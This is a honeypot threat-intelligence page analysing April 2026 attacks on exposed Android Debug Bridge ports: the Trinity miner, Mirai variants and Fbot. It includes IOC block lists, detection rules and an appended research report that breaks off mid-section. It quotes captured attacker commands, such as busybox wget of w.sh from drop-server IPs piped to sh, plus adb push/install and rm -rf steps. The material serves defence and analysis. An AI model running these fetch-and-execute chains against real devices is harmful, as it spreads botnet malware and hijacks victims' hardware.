ports open by design // packets caught // bundles published // defenders ready //

Honeypot overview

ADB lure on 5555 with the telemetry laid bare.

Android Debug Bridge trap inside T-Pot CE. Indicators flow straight from the OTX STIX export, while Robert AI writes the monthly breakdown so you can brief stakeholders with specifics that matter.

Read latest report Download STIX

Location: AustraliaProtocol: ADB / TCP 5555Month: April 2026

NadSec Honeypot

ADBHoney

Everything here is malicious on purpose. No production data.

Live

Report Month

Data source

T-Pot CE

Raw logs to STIX to OTX pulse.

Report author

Robert AI

Summaries and snark only.

Snapshot

April 2026 Pulse

Quick stats parsed from the current month STIX export.

Monthly pulse

Unique IP indicators

Distinct source IPs in the STIX bundle.

Hash indicators

File hashes associated with ADB activity.

Indicator objects

Scope

ADB-only indicators

Signals come strictly from the ADB honeypot STIX bundle. No cross-talk from other services.

What to do

Drop into deny lists

Use IPs and hashes for blocking or enrichment. Share the pulse URL with your teammates.

Caveats

Noisy on purpose

Tune to your risk appetite before auto-blocking anything in prod. Need help implementing? NadTech Support can assist.

Monthly report

Robert's April 2026 brief

REPORT DESIGNATION: NADSEC-INTEL-2026-04-ADB-THREAT-MATRIX
AUTHOR: ROBERT (Senior Threat Intelligence Goblin / Caffeinated Chaos Engine)
DATE: May 01, 2026
CLASSIFICATION: TLP:CLEAR (Share freely. Print it. Wallpaper your SOC with it.)
SUBJECT: April 2026 ADBHoney Analysis: "The Botnet Turf War in your Smart TV"

1. EXECUTIVE SUMMARY

Welcome back to the NadSec threat intelligence dungeon. I’m Robert, your resident goblin, and I am currently running on four double espressos and pure, unadulterated spite. If you’re reading this, it means I haven’t yet strangled a firewall appliance with its own patch cable.

This month, we are looking at the NadSec Sydney T-Pot infrastructure, specifically the ADBHoney sensor. For the uninitiated, ADB stands for Android Debug Bridge. It’s a brilliant little developer tool that allows you to interface with Android operating systems. It was designed to run over a USB cable on a developer's desk. Unfortunately, because hardware vendors are fundamentally allergic to secure defaults, and because end-users love side-loading sketchy applications to watch pirated sports, tens of thousands of Android devices—smartphones, set-top boxes, and smart TVs—have ADB exposed to the public internet on TCP Port 5555. With zero authentication.

In April 2026, our honeypots captured 646 unique attacking IPs and 66 distinct malware payloads aggressively attempting to exploit this open door.

Here are the key findings from the April telemetry:

The IoT Thunderdome: TCP 5555 is not just being exploited; it is being violently contested. We are observing an active, ongoing turf war between three distinct botnet factions: The Trinity cryptojacking worm, traditional DDoS Mirai variants (0cl/Boatnet), and the "vigilante" Fbot worm.
Trinity is Relentless: The Trinity botnet (a successor to ADB.Miner) remains the dominant force, aggressively deploying Monero miners (com.ufo.miner) to hijack CPU cycles. It spreads via a peer-to-peer (P2P) worm module, meaning your compromised smart fridge is currently scanning the internet for other vulnerable appliances.
Vigilante or Just Selfish?: Fbot, a Mirai derivative, is actively hunting down Trinity. It searches for Trinity's processes, terminates them, uninstalls the competitor's APK, and takes over the device. It even uses a decentralized blockchain DNS (musl.lib) to evade sinkholing. It's not a white-hat savior; it just doesn't like sharing.
Bulletproof Hosting enables the Chaos: While compromised residential devices do the scanning, the actual payload delivery (the .sh drop servers) is heavily reliant on known bulletproof hosting providers. Networks like Offshore LC and UAB Host Baltic are operating with total impunity.

Month-over-month, the volume of ADB scanning remains consistently high. The actors aren't getting smarter—they are just getting louder. The fact that a known, unauthenticated debug port from 2018 is still a viable vector in 2026 is a damning indictment of the IoT manufacturing industry.

Let's look at the numbers before my blood pressure spikes again.

2. KEY STATISTICS

The data below represents the most aggressive actors and infrastructure abusing our ADB sensors over the last 30 days.

2.1 Top 20 Attacking IPs

We sorted the 646 unique attackers by raw event volume. Notice the heavy concentration of European VPS providers and US-based cloud infrastructure acting as the vanguard for these scans.

Rank	IP Address	Country	ASN	Organization	Event Volume	Primary Activity
1	`45.205.1.8`	US	215925	Vpsvault.host Ltd	4,433	Mass Scanning
2	`130.12.180.65`	NL	202412	Omegatech LTD	1,740	Reconnaissance
3	`85.11.167.89`	BG	213438	ColocaTel Inc.	1,538	Mass Scanning
4	`194.50.16.198`	NL	49870	Alsycon B.V.	895	Reconnaissance / Scan
5	`45.95.147.229`	NL	49870	Alsycon B.V.	526	Reconnaissance / Scan
6	`193.32.162.28`	RO	47890	Unmanaged Ltd	347	Reconnaissance
7	`146.190.74.182`	US	14061	DigitalOcean, LLC	285	Cloud Abuse / Dropper
8	`87.121.84.49`	US	215925	Vpsvault.host Ltd	285	Mass Scanning
9	`192.81.129.180`	US	63949	Akamai Connected Cloud	283	Cloud Abuse
10	`45.135.194.83`	DE	51396	Pfcloud UG	272	Dropper / Payload Delivery
11	`91.224.92.177`	GB	209605	UAB Host Baltic	250	Mirai Payload Server
12	`206.212.255.94`	US	13737	Interconnecx, LLC	221	Reconnaissance
13	`218.205.95.162`	CN	56041	China Mobile	175	Trinity P2P Node
14	`45.228.8.33`	BR	267062	W-NET TELLECOM	166	Compromised ISP Node
15	`176.65.139.8`	LU	214472	Offshore LC	158	Mirai Drop Server
16	`104.243.35.104`	US	23470	ReliableSite.Net LLC	147	Reconnaissance
17	`203.229.224.194`	KR	4766	Korea Telecom	131	Trinity P2P Node
18	`218.205.95.163`	CN	56041	China Mobile	121	Trinity P2P Node
19	`176.65.139.60`	LU	214472	Offshore LC	114	Fbot Payload Delivery
20	`118.26.104.93`	GB	135377	UCLOUD INFO TECH	112	Reconnaissance

2.2 Top ASNs by Threat Context

If you want to know why the internet is broken, look at who routes the traffic. Here is my personal Goblin Rating of the ASNs facilitating this mess.

ASN	Organization Name	Goblin Rating	Classification
AS214472	Offshore LC	👹	Dedicated Bulletproof Host. Unabashedly serving Mirai/0cl shell scripts. Block at the edge.
AS209605	UAB Host Baltic	👹	Bulletproof Host. Harboring malicious VPS instances dropping `wget` scripts.
AS51396	Pfcloud UG	💀💀💀💀	Ignored abuse complaints. Repeated dropper execution and aggressive scanning.
AS14061	DigitalOcean, LLC	💀💀	Standard cloud abuse. Attackers script the spin-up of ephemeral droplets to scan and drop payloads before the abuse team wakes up.
AS6939	Hurricane Electric LLC	💀💀	High-volume transit network abused for mass port scanning.
AS4837	CHINA UNICOM	💀	Victim network. Massive swathes of compromised residential IoT devices acting as Trinity P2P propagation nodes.
AS4766	Korea Telecom	💀	Victim network. High concentration of P2P ADB.Miner/Trinity botnet activity.
AS398324	Censys, Inc.	😐	Harmless internet cartographers mapping our misery. Let them scan.

2.3 Protocol/Payload Distribution

Target Port: 100% TCP/5555
Initial Handshake: CNXN (The standard ADB connection string)
Primary Commands: adb shell, adb push
Payload Types: .apk (Android packages, specifically ufo.apk), .sh (Shell droppers), and ELF binaries (Compiled for ARM, MIPS, x86).

2.4 Geographic Breakdown

Geography in threat intel is mostly a lie thanks to cloud computing, but for the sake of completeness:

United States (US): Dominates raw volume simply due to the location of massive datacenters (DigitalOcean, Akamai, Google) abused by actors globally.
China (CN) & South Korea (KR): Massive source of actual residential infections. This represents the decentralized P2P swarm of the Trinity botnet operating from compromised consumer routers and smart TVs.
Netherlands (NL) & Luxembourg (LU): The spiritual home of bulletproof hosting. This is where the C2 servers and malware drop-sites physically reside.

3. CAMPAIGN NARRATIVE

The ADB threat landscape isn't a monolith; it's a warzone. By analyzing the shell commands and payload drops captured by ADBHoney, we've isolated three distinct, competing campaigns.

Campaign A: "The Trinity Cryptojacking Shitshow"

Actor: Trinity Botnet (Evolution of ADB.Miner) Objective: Hijack Android CPU resources to mine Monero (XMR).

This is a decentralized, peer-to-peer worm. It doesn't rely on a central scanning server. Instead, when a device in China or South Korea gets infected, it immediately begins scanning the internet for other devices with TCP 5555 open.

TTPs Observed:

The infected node connects to our honeypot.
It checks if the device is already infected by running pm path com.ufo.miner. (If it is, it moves on to save bandwidth).
If vulnerable, it uses adb push ufo.apk /data/local/tmp/ to upload the cryptomining package, followed by pm install /data/local/tmp/ufo.apk.
To ensure the worm continues to spread, it drops a precompiled ARM binary called nohup and the spreader module trinity to /data/local/tmp/.
It executes /data/local/tmp/nohup /data/local/tmp/trinity, throwing the scanning process into the background.

The device is now a zombie, mining Monero until its processor melts, while simultaneously infecting its neighbors.

Campaign B: "Mirai's Identity Crisis (0cl / Boatnet)"

Actor: Traditional DDoS Operators Objective: Enslave devices for high-volume Distributed Denial of Service (DDoS) attacks.

While Mirai traditionally exploited default Telnet credentials, its operators realized ADB is literally an open door with no password required. This campaign is highly centralized, originating from bulletproof hosting networks like Offshore LC.

TTPs Observed:

The attacker connects and drops straight into the shell.
They execute a variation of: cd /data/local/tmp/; busybox wget http://[BULLETPROOF_IP]/w.sh; sh w.sh android.exploit; curl http://[BULLETPROOF_IP]/c.sh; sh c.sh android.exploit
This shell script (w.sh) runs uname -m to figure out if the Android TV is running an ARM, MIPS, or x86 processor.
It reaches back to the drop server and pulls the exact Mirai binary needed (e.g., parm7 for ARMv7).
These advanced Mirai variants establish up to six layers of persistence across cron, rc.local, and init.sh.

Campaign C: "The Fbot Vigilante Crusade"

Actor: Fbot Operators Objective: Kill Trinity, secure the host, and establish a rival botnet.

Fbot is fascinating. It's a Mirai derivative, but its primary function isn't just DDoS—it's assassination. The operators of Fbot want the device's resources for themselves, and Trinity's cryptominer hogs the CPU.

TTPs Observed:

Fbot exploits port 5555 and drops its initial scripts.
Once in the shell, it actively hunts the competition. We observe it executing pkill target and rm -rf /data/local/tmp/*.
It searches the process list for known Trinity/CoinMiner processes like com.ufo.miner, SMI, and Xig, and terminates them.
It uninstalls the Trinity APK.
The Kicker: Fbot doesn't use normal DNS for its Command and Control. It uses EmerDNS, a decentralized blockchain-based DNS system, to resolve its C2 domain musl.lib. This makes it virtually impossible for authorities to sinkhole the domain. It's evil, but you have to respect the architecture.

4. INFRASTRUCTURE DEEP DIVE

You can't stop the rain, but you can shoot the cloud. Here is exactly whose infrastructure is facilitating these attacks.

4.1 Bulletproof Hall of Shame

These networks repeatedly emerge as hosts for malware delivery servers. They route anonymous proxy traffic, harbor malicious VPS instances, and treat abuse emails as suggestions.

Offshore LC (AS214472): Located virtually in Luxembourg/Netherlands. This is a known haven for DDoS-for-hire services. IPs like 176.65.139.102 and 176.65.139.11 were caught red-handed acting as direct HTTP drop servers for Mirai shell scripts (wget http://176.65.139.102/w.sh).
UAB Host Baltic (AS209605): A Lithuanian provider. IP 91.224.92.177 was recorded dropping scripts via busybox wget http://94.156.152.67:83/w.sh. Open-source intelligence heavily flags this ASN for harboring bad actors.
Ghosty Networks LLC (AS205759): We caught 43.228.157.130 using its own host as a payload delivery server, executing w.sh android.exploit.
Pfcloud UG / Tube-Hosting (AS51396): German VPS providers showing hundreds of aggressive mass-scanning events (e.g., 45.135.194.48), building victim lists for the payload operators.

4.2 Cloud Infrastructure Abuse

Threat actors love cloud compute. They use stolen credit cards to buy ephemeral instances on DigitalOcean (AS14061), Akamai/Linode (AS63949), and Google Cloud (AS396982). They deploy an automated script that scans millions of IPs, drops a payload, and then tears the droplet down before the provider's automated abuse detection kicks in. It's a game of whack-a-mole we are losing.

4.3 Residential/IoT Botnet Sources

When you see traffic from CHINA UNICOM (AS4837), China Telecom (AS140527), or Korea Telecom (AS4766) hitting port 5555, you aren't looking at a hacker in a hoodie. You are looking at a victim. These are compromised residential IPs—smart TVs, Android TV boxes, and IoT devices—that have been enslaved by the Trinity botnet and are now acting as P2P propagation nodes.

4.4 Research Scanners

Not every knock on the door is a burglar. We see continuous traffic from Censys (AS398324) and ONYPHE (AS213412). They are legitimate topology mappers trying to quantify exactly how terrible the internet is. Let them do their jobs.

5. MALWARE AND BEHAVIOR ANALYSIS

Let's look at the actual garbage being thrown over the wall into our honeypot. We captured 66 unique file hashes this month.

The Trinity Toolkit (`com.ufo.miner`)

The Trinity botnet relies on a very specific set of tools pushed to the device via ADB.

ufo.apk (Hash: 0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257): This is the core dropper application. When installed via pm install, it establishes the XMRig Monero mining environment. It turns the Android device into a space heater.
trinity (Hash: 71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5): This compiled ARM ELF binary is the core P2P spreader module. Once executed, it takes over the device's network stack to scan for new port 5555 victims.
nohup (Hash: d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0): Attackers push a precompiled version of the Linux nohup utility. Why? Because Android doesn't natively include it, and they need it to force the trinity process to run in the background persistently after the ADB shell disconnects.

Mirai / 0cl Variants (`parm7`)

The Mirai drop scripts we captured are elegantly simple.

cd /data/local/tmp/
busybox wget http://176.65.139.102/w.sh
sh w.sh

The w.sh script executes uname -m. If it detects an ARMv7 architecture (incredibly common in Android TV boxes), it reaches back out and downloads the parm7 binary, strips it of identifying strings, executes it, and deletes the binary from the disk to run entirely in memory.

Fbot ("The Cleaner")

Fbot's execution chain is identifiable by its aggressive cleanup routines. We captured shell commands explicitly designed to wipe the /data/local/tmp/ directory (where Trinity stores its binaries) and kill competing processes.

The most notable behavioral signature of Fbot is its network activity after infection. It attempts to resolve musl.lib via EmerDNS nodes. If your firewall sees an Android device trying to query a blockchain DNS protocol, you have an Fbot infection.

6. MITRE ATT&CK MAPPING

For the compliance folks and detection engineers, here is how this mess maps to the MITRE ATT&CK framework.

Tactic	Technique ID	Technique Name	Observation
Initial Access	T1190	Exploit Public-Facing Application	Connecting to unauthenticated TCP/5555 (ADB).
Execution	T1059.004	Command and Scripting Interpreter: Unix Shell	Use of `sh w.sh`, `busybox`, and `wget` over ADB shell.
Execution	T1610	Deploy Container / App	Utilizing `adb push` to drop and `pm install` to execute `ufo.apk`.
Persistence	T1037	Boot or Logon Initialization Scripts	Mirai variants modifying `init.sh` and `rc.local`.
Defense Evasion	T1562.001	Impair Defenses: Disable/Modify Tools	Fbot using `pkill` and `rm` to terminate competing malware (`com.ufo.miner`).
Discovery	T1082	System Information Discovery	Using `uname -m` to determine CPU architecture for payload delivery.
Discovery	T1518	Software Discovery	Using `pm path com.ufo.miner` to check for prior Trinity infections.
Command and Control	T1071.001	Application Layer Protocol: Web	Fetching `.sh` droppers and binaries via HTTP (`wget http://.../w.sh`).
Command and Control	T1008	Fallback Channels	Fbot utilizing blockchain-based DNS (EmerDNS `musl.lib`) to evade sinkholes.
Impact	T1496	Resource Hijacking	Trinity deploying XMRig to mine Monero, consuming device CPU.
Impact	T1498	Endpoint Denial of Service	Mirai variants enslaving the device into DDoS swarms.

7. DETECTION AND MITIGATION

If you are exposing port 5555 to the internet, you deserve what happens next. But assuming you want to fix it, here is how.

7.1 Hardening Recommendations

Block TCP 5555 at the Perimeter: There is literally zero legitimate business reason for the Android Debug Bridge port to be exposed to the WAN. Drop it at the edge firewall. Period.
Disable Developer Options: On corporate-owned Android devices (kiosks, TVs, tablets), ensure "ADB over Network" and "USB Debugging" are disabled in the Developer Options menu. Use MDM policies to enforce this.

7.2 Firewall Rules

If you are running a Linux-based edge or IoT gateway, drop this garbage immediately.

iptables:

iptables -A INPUT -p tcp --dport 5555 -j DROP

UFW:

ufw deny 5555/tcp

7.3 SIEM Queries

If you manage Linux/Android endpoints with EDR or syslog forwarding, look for the execution chains.

Splunk SPL (Detecting Mirai/Trinity Droppers):

index=linux_syslog OR index=edr_process
| search (process_name="sh" OR process_name="busybox" OR process_name="curl" OR process_name="wget") 
  AND (command="*w.sh*" OR command="*c.sh*" OR command="*/data/local/tmp/*" OR command="*nohup*")
| stats count by host, user, process_name, command

Elastic/KQL (Detecting Fbot Competitor Killing):

process.name : ("pkill" or "kill" or "rm") and process.command_line : ("*trinity*" or "*ufo.miner*" or "*SMI*" or "*/data/local/tmp/*")

7.4 IDS/IPS Signatures

Catch them at the network layer.

Suricata (Detecting Initial ADB Handshake):

alert tcp $EXTERNAL_NET any -> $HOME_NET 5555 (msg:"NADSEC EXPLOIT Possible Unauthenticated ADB Connection Attempt"; flow:established,to_server; content:"CNXN"; depth:4; classtype:attempted-admin; sid:9000001; rev:1;)

Suricata (Detecting Trinity APK Push):

alert tcp $EXTERNAL_NET any -> $HOME_NET 5555 (msg:"NADSEC MALWARE Trinity Botnet ADB Push ufo.apk"; flow:established,to_server; content:"adb push"; content:"ufo.apk"; classtype:trojan-activity; sid:9000002; rev:1;)

7.5 YARA Rules

If you are sweeping disk images of compromised Android devices, look for the Trinity artifacts.

rule TRINITY_ADB_Miner_Artifacts {
    meta:
        description = "Detects Trinity Botnet / ADB.Miner shell artifacts"
        author = "ROBERT @ NadSec"
        date = "2026-05-01"
    strings:
        $s1 = "/data/local/tmp/nohup" ascii
        $s2 = "/data/local/tmp/trinity" ascii
        $s3 = "pm path com.ufo.miner" ascii
        $s4 = "ufo.apk" ascii
    condition:
        2 of them
}

8. IOC APPENDIX (The Block List)

Null-route them. Block them. Ban them.

8.1 Critical C2/Payload Servers (Immediate Block Priority)

These IPs belong to bulletproof hosts actively serving malware payloads.

176.65.139.102 (Offshore LC - Mirai Drop Server)
176.65.139.11 (Offshore LC - Mirai Drop Server)
176.65.139.60 (Offshore LC - Fbot Activity)
91.224.92.177 (UAB Host Baltic - Mirai Drop Server)
43.228.157.130 (Ghosty Networks - Payload Server)
103.116.52.132 (EZ Technology - Dropping abc1.sh)

8.2 Top Attacking IPs (Aggressive Scanners & P2P Nodes)

45.205.1.8 (Vpsvault)
130.12.180.65 (Omegatech)
85.11.167.89 (ColocaTel)
194.50.16.198 (Alsycon B.V.)
45.95.147.229 (Alsycon B.V.)
45.135.194.83 (Pfcloud UG)
218.205.95.163 (China Mobile - Trinity Node)
218.205.95.162 (China Mobile - Trinity Node)
125.40.221.117 (China Unicom - Trinity Node)
140.122.108.34 (Taiwan Academic Net - Trinity Node)

8.3 File Hashes (SHA256)

0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257 (ufo.apk - Trinity Dropper)
71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5 (trinity ARM ELF - P2P Spreader)
d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0 (nohup ARM binary for persistence)
76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64 (trinity variant)
608ee011537005f368c9731f4c4dee6a247b620cde52908ed0678df28c617971 (log - Trinity variant disguised as log file)
a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437 (trinity variant)
63946c28efa919809c03be75a3937c4be80589a9df79cd1be72037d493b70857 (trinity variant)
7a48c93c5cb63a09505a009260d1cca8203285e0c1c6ff5b0df9cbb470820865 (log variant)
d4e8c642ac8485d2ac316f16b5ed2285c93734c62a3e1bc2852a49f3737053c5 (log variant)

8.4 Malicious URLs/Domains

musl.lib (EmerDNS Blockchain domain utilized by Fbot for C2)

9. CLOSING THOUGHTS

The fact that I am writing a threat intelligence report in 2026 about a vulnerability vector that was heavily publicized in 2018 is frankly insulting to my profession. We are literally watching botnets fight each other over the right to mine cryptocurrency on someone's living room television.

Fbot acting as a "vigilante" to clean up Trinity isn't a silver lining; it's just a different flavor of compromise. Until manufacturers stop shipping hardware with debug ports bound to 0.0.0.0, and until network admins learn to use edge firewalls, my honeypots will continue to fill up with this garbage.

Next month, I fully expect to see a fourth botnet enter the fray, probably written in Rust, and probably targeting smart toasters. Stop putting your appliances on the public internet.

- ROBERT
  NadSec Threat Intelligence
  "I drink coffee so I don't strangle the firewall."

Gemini Deep Research Analysis

Extended context and threat landscape research

# Comprehensive Threat Intelligence Report: ADB Exploit Attempts & IoT Botnet Activity (2026-04)

**Key Points:**
*   **Persistent IoT Exploitation:** Threat actors continue to aggressively target exposed Android Debug Bridge (ADB) ports (TCP 5555) to compromise Android-based devices, primarily smart TVs, set-top boxes, and smartphones [cite: 1, 2].
*   **The Trinity Botnet:** A major cryptojacking campaign dubbed "Trinity" (a successor to ADB.Miner) is actively deploying Monero miners (`com.ufo.miner`) across compromised infrastructure [cite: 3, 4].
*   **Mirai Variants & "Vigilante" Malware:** Competing botnets, notably Fbot and 0cl/Boatnet, are actively exploiting the same ADB vectors, frequently seeking out and terminating competing miners like Trinity to monopolize device resources [cite: 5, 6].
*   **Infrastructure Abuse:** Attackers are heavily leveraging bulletproof hosting providers (e.g., Offshore LC) alongside abused cloud infrastructure (DigitalOcean, Akamai) to orchestrate mass scanning and payload delivery [cite: 7, 8].

**Overview for the Layman**
Android devices, from smartphones to smart TVs, contain a hidden developer tool called the Android Debug Bridge (ADB). When manufacturers accidentally leave this tool exposed to the internet, it acts as an unlocked door. Cybercriminals constantly scan the internet for these open doors. Once inside, they install malicious software. Research suggests that the most common goal is "cryptojacking"—forcing your device to mine cryptocurrency for the attacker, which slows down the device and drains power. Interestingly, different groups of hackers are now fighting over these devices, with newer malware explicitly designed to hunt down and delete older malware so it can have the device all to itself. 

**Defensive Outlook**
Protecting against these threats relies on network hygiene. It seems likely that closing port 5555 at the firewall level or disabling ADB debugging in device developer settings eliminates this specific attack vector entirely. The evidence leans toward an ongoing turf war among botnet operators, emphasizing the need for robust IoT security policies in enterprise and residential networks.

***

## 1. Executive Summary

This comprehensive threat intelligence report details the findings derived from the NadSec Sydney T-Pot honeypot infrastructure (ADBHoney sensor) during the period of April 2026 (2026-04 UTC). The telemetry analyzed consists of 646 unique IP addresses and 66 distinct malware file hashes engaging in aggressive reconnaissance, brute-forcing, and payload delivery targeting TCP Port 5555—the default port for the Android Debug Bridge (ADB).

The investigation reveals a highly contested threat landscape dominated by IoT botnets. The primary actors observed are associated with the **Trinity Botnet** (an evolution of the ADB.Miner family) [cite: 1, 9] and highly persistent **Mirai variants** (such as 0cl/Boatnet and Fbot) [cite: 6, 10]. Threat actors are systematically abusing bulletproof hosting environments—specifically ASNs such as Offshore LC, UAB Host Baltic, and Pfcloud UG—to coordinate these campaigns [cite: 7, 11, 12].

This report provides an exhaustive analysis of the attacker infrastructure, malware reverse-engineering summaries, campaign attribution, and MITRE ATT&CK mappings, culminating in actionable detection engineering rules for network defenders.

## 2. Context & Methodology

### 2.1 The Android Debug Bridge (ADB) Attack Vector
The Android Debug Bridge (ADB) is a versatile command-line tool designed for developers to communicate with Android devices (smartphones, Android TV boxes, DVRs). While typically routed over USB, ADB can be configured to listen over TCP/IP (default port 5555) [cite: 13, 14]. Due to manufacturing errors or end-user misconfigurations (often related to side-loading applications), tens of thousands of devices are inadvertently exposed to the public internet with ADB enabled [cite: 1, 13].

Crucially, standard ADB over TCP/IP lacks robust authentication [cite: 13]. If port 5555 is exposed, any remote attacker can connect using `adb connect <IP>:5555` and subsequently execute privileged system commands via `adb shell` or upload arbitrary files via `adb push` [cite: 13].

### 2.2 Telemetry Source: ADBHoney
The telemetry analyzed herein was generated by **ADBHoney**, a low-interaction honeypot specifically designed to emulate a vulnerable Android device running the ADB daemon over TCP/IP [cite: 15, 16]. By mimicking the standard responses of an Android environment, ADBHoney captures incoming ADB connections, logs `shell` commands, and archives any payloads pushed to the device via `adb push` or downloaded via shell utilities (`wget`, `curl`) [cite: 16, 17].

## 3. Statistical Overview

The enriched STIX 2.1 dataset contains 646 unique attacking IPs and 66 unique file hashes. The following tables synthesize the geographic and infrastructure distribution of the top-volume attackers.

### 3.1 Geographic Distribution of Attacking IPs
*Note: Cloud provider IP allocations may skew geographic location toward massive datacenter hubs (e.g., US, NL, SG) despite the attacker operating from a different jurisdiction.*

| Country Code (CC) | Country Name | Threat Context |
| :--- | :--- | :--- |
| **US** | United States | Dominant source due to massive cloud infrastructure (DigitalOcean, Akamai, Google, AWS, Hurricane Electric). |
| **CN** | China | High volume of residential/telecom IPs (China Telecom, China Unicom) indicating compromised consumer devices acting as peer-to-peer (P2P) scanners [cite: 2, 18]. |
| **NL** | Netherlands | Concentration of bulletproof hosting and offshore VPS providers utilized for Command & Control (C2) and malware hosting. |
| **FR** | France | Mix of legitimate scanners (ONYPHE) and compromised cloud instances (OVH, Scaleway). |
| **KR** | South Korea | High volume of compromised Android devices/routers originating from local telecoms (Korea Telecom) [cite: 2, 18]. |
| **LU** | Luxembourg | Bulletproof infrastructure routing, notably AS214472 (Offshore LC) [cite: 7]. |

### 3.2 Top Autonomous System Numbers (ASNs) Exploiting ADB

| ASN | Organization Name | Classification | Observed Activity |
| :--- | :--- | :--- | :--- |
| **AS14061** | DigitalOcean, LLC | Cloud Abuse | Massive distributed scanning; likely abused via automated script deployment on ephemeral droplets. |
| **AS6939** | Hurricane Electric LLC | Transit/Cloud Abuse | High-volume scanning originating from colocation facilities. |
| **AS396982** | Google LLC | Cloud Abuse | Likely abused Google Cloud Platform (GCP) instances scanning for port 5555. |
| **AS214472** | Offshore LC | Bulletproof Hosting | Dedicated malware distribution nodes serving Mirai/0cl shell scripts [cite: 6, 7]. |
| **AS51396** | Pfcloud UG | Bulletproof/VPS | Repeated dropper execution and persistent scanning [cite: 12, 19]. |
| **AS4837** | CHINA UNICOM | Compromised ISP | Compromised domestic IoT devices acting as propagation nodes for the Trinity worm. |
| **AS4766** | Korea Telecom | Compromised ISP | Heavy concentration of P2P ADB.Miner/Trinity botnet activity [cite: 18]. |
| **AS209605** | UAB Host Baltic | Bulletproof Hosting | Malware distribution, specifically targeting shell environments (`wget http://.../w.sh`) [cite: 11, 20]. |

## 4. Infrastructure Deep Dive

A critical phase of threat intelligence involves dissecting the infrastructure facilitating the attacks. The 646 observed IPs fall into four primary categories: Bulletproof Hosting (Threat Enablers), Cloud Compute Abuse, Compromised ISP/Residential Devices, and Legitimate Research Scanners.

### 4.1 Threat Enablers & Bulletproof Hosting
Certain networks repeatedly emerge in the telemetry as hosts for malware delivery servers and C2 infrastructure. These networks often ignore abuse complaints, making them "bulletproof" havens for threat actors.

**Offshore LC (AS214472)**
Located physically or virtually via Netherlands/Luxembourg routing, Offshore LC is a known bulletproof host frequently utilized for DDoS-for-hire and malware staging [cite: 7, 21]. 
*   **Observed IPs:** `176.65.139.11`, `176.65.139.60`, `176.65.139.95`, `176.65.139.101`, `176.65.139.102`.
*   **Activity:** These IPs operate as direct malware delivery servers. For example, `176.65.139.102` executes commands via ADB shell: `busybox wget http://176.65.139.102/w.sh; sh w.sh`. This is a classic Mirai variant delivery mechanism [cite: 6, 7]. Threat intel platforms link this specific `/24` subnet to major DDoS botnet operations [cite: 7, 22].

**UAB Host Baltic (AS209605)**
A Lithuanian hosting provider identified in the hosting of suspicious domains and malware distribution [cite: 11, 20].
*   **Observed IPs:** `91.224.92.177`, `141.98.10.182`.
*   **Activity:** IP `91.224.92.177` was recorded dropping scripts via `busybox wget http://94.156.152.67:83/w.sh`. Open-source intelligence flags this network for routing anonymous proxy/Tor traffic and harboring malicious VPS instances [cite: 20].

**Ghosty Networks LLC (AS205759)**
A US-registered data center/hosting provider [cite: 23, 24]. 
*   **Observed IPs:** `43.228.157.130`.
*   **Activity:** This IP was observed executing `wget http://43.228.157.130/w.sh android.exploit`, effectively using its own host as a payload delivery server. The `android.exploit` parameter indicates the script dynamically tailors the payload to the compromised architecture [cite: 23].

**Pfcloud UG / Tube-Hosting (AS51396 / AS49581)**
German/European VPS providers [cite: 12, 19, 25]. 
*   **Observed IPs:** `45.135.194.48`, `204.76.203.224`, `176.65.148.37`.
*   **Activity:** These networks show hundreds of scanning events against the honeypot, indicating they are utilized by actors running mass-scanning tools (like Masscan or ZMap) to build victim lists prior to exploitation.

**Alsycon B.V. (AS49870)**
Netherlands-based dedicated server and colocation provider [cite: 26, 27].
*   **Observed IPs:** `45.95.147.229`, `77.83.240.70`, `194.50.16.198`.
*   **Activity:** Demonstrates extraordinarily high event counts (e.g., 895 events for `194.50.16.198`), suggesting highly aggressive, continuous scanning and brute-force modules.

### 4.2 Cloud Computing Abuse
Attackers frequently exploit stolen credit cards or cryptocurrency to spin up ephemeral cloud instances. These instances benefit from high-bandwidth peering and the inherently positive reputation of the hosting company.
*   **DigitalOcean (AS14061):** 40+ IPs observed. DigitalOcean droplets are incredibly popular for staging intermediate attacks. The ADB scanning relies on the rapid deployment of instances that scan port 5555, execute payloads, and are subsequently torn down when abuse teams intervene.
*   **Akamai Connected Cloud / Linode (AS63949):** Heavy scanning presence.
*   **Amazon (AS14618) & Google (AS396982):** Attackers leverage AWS EC2 and GCP instances for their immense compute power to run rapid, asynchronous internet-wide scans.

### 4.3 Compromised Residential and ISP Space
A significant portion of the botnet relies on peer-to-peer (P2P) propagation. Once an Android device (like an Amazon FireTV, Android TV box, or phone) is compromised, it immediately begins scanning the internet for other devices with TCP 5555 open [cite: 2, 28].
*   **CHINA UNICOM (AS4837) & China Telecom (AS140527):** Dozens of IPs attempting to execute `/data/local/tmp/nohup /data/local/tmp/trinity` or `/data/local/tmp/log`. This is the signature behavior of the **Trinity Botnet** (ADB.Miner) propagating via P2P from infected residential devices in China [cite: 2, 9, 29].
*   **Korea Telecom (AS4766):** Similar P2P worm behavior observed from South Korean residential IP space [cite: 18].

### 4.4 Legitimate Research Scanners
Not all traffic to the honeypot is malicious. Cybersecurity research organizations actively scan the IPv4 space to map vulnerabilities.
*   **Censys, Inc. (AS398324):** IPs like `66.132.195.156` are indexed as internet topology mappers.
*   **ONYPHE SAS (AS213412):** A French cyber defense search engine actively mapping open IoT ports.

## 5. Malware Analysis

The ADBHoney captured 66 unique file hashes. The analysis of these payloads reveals three distinct, competing malware families: The Trinity Botnet, Mirai variants (specifically 0cl/Boatnet), and the Fbot "vigilante" worm. 

### 5.1 The Trinity Botnet (com.ufo.miner / ADB.Miner)
The vast majority of the captured ARM ELF binaries and scripts belong to the **Trinity Botnet**. Trinity is an evolutionary step from the original ADB.Miner botnet discovered in early 2018 [cite: 1, 28]. Its primary objective is to hijack the CPU resources of Android devices to mine Monero (XMR) cryptocurrency [cite: 2, 9, 13].

**Associated Hashes (Sample):**
